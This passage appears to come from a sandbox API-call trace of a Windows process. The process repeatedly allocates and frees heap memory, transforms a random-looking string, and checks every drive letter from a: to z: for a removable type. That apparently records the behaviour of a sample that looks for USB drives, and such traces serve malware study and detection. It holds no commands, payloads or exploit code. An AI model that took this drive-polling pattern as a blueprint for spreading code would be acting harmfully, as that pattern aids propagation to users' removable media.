RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0206.313] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0206.313] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.313] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0206.313] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0206.313] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0206.313] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e80 [0206.313] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0206.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0206.313] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0206.313] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0206.313] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e80 | out: hHeap=0x12c0000) returned 1 [0206.313] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0206.313] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0206.313] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e5c0 [0206.313] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.313] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e5c0 | out: hHeap=0x12c0000) returned 1 [0206.313] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.313] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0206.314] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0206.314] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0206.314] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0206.314] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0206.314] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0206.314] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0206.314] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0206.314] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0206.314] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.314] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0206.314] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0206.314] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.314] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0206.314] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0206.314] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0206.314] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0206.314] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0206.314] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0206.314] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0206.315] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.315] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0206.315] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0206.315] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0206.315] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0206.315] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0206.315] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0206.315] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0206.315] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0206.315] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0206.315] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0206.315] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0206.315] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0206.315] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0206.316] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0206.316] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0206.316] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0206.316] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0206.316] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0206.316] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0206.316] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0206.317] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0206.317] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0206.317] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0206.317] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0206.317] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0206.317] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0206.318] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0206.318] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0206.318] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0206.318] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0206.319] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0206.320] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0206.320] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0206.320] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0206.320] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0206.320] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0206.321] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0206.321] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0206.321] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0206.321] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0206.321] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0206.321] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0206.321] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0206.321] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0206.321] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0206.321] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0206.321] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0206.321] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0206.321] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0206.321] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0206.321] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.322] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0206.322] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0206.322] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0206.322] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326060 [0206.322] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0206.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0206.322] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0206.322] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0206.322] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326060 | out: hHeap=0x12c0000) returned 1 [0206.322] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0206.322] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0206.322] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e000 [0206.322] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.322] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e000 | out: hHeap=0x12c0000) returned 1 [0206.322] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.323] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0206.323] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0206.323] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0206.323] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0206.323] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0206.323] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0206.323] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0206.323] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0206.323] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0206.323] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.323] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0206.323] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0206.323] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.323] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0206.323] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0206.323] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0206.323] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0206.324] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0206.324] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd340 [0206.324] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0206.324] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.324] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0206.324] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0206.324] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0206.324] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0206.324] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0206.324] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0206.324] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0206.324] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0206.324] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0206.324] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0206.324] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0206.324] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0206.325] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0206.325] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0206.325] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0206.325] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0206.325] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0206.325] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0206.325] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0206.326] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0206.326] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0206.326] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0206.326] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0206.327] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0206.327] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0206.327] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0206.327] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0206.327] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0206.327] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0206.328] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0206.328] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0206.328] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0206.328] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0206.328] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0206.328] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0206.328] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0206.329] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0206.329] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0206.329] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0206.329] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0206.329] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0206.329] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0206.329] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0206.329] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0206.329] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0206.329] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0206.329] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0206.329] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0206.329] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0206.329] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0206.329] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.329] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0206.329] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0206.329] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0206.330] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260e0 [0206.330] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0206.330] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0206.330] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0206.330] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0206.362] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260e0 | out: hHeap=0x12c0000) returned 1 [0206.362] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0206.362] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0206.362] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e300 [0206.362] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.362] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e300 | out: hHeap=0x12c0000) returned 1 [0206.362] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.362] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0206.362] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0206.362] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0206.362] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0206.362] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0206.362] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0206.362] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0206.362] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0206.363] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0206.363] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.363] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0206.363] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0206.363] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.363] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0206.363] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0206.363] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0206.363] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0206.363] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0206.363] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0206.363] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0206.363] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.363] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0206.364] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0206.364] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0206.364] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0206.364] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0206.364] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0206.364] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0206.364] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0206.364] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0206.364] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0206.364] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0206.364] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0206.364] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0206.364] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0206.364] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0206.364] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0206.365] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0206.365] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0206.365] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0206.365] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0206.365] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0206.366] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0206.366] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0206.366] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0206.366] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0206.366] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0206.366] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0206.366] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0206.367] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0206.367] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0206.367] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0206.367] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0206.367] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0206.367] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0206.367] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0206.368] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0206.368] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0206.368] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0206.368] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0206.368] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0206.368] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0206.368] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0206.368] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0206.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0206.369] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0206.369] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0206.369] RtlAllocateHeap 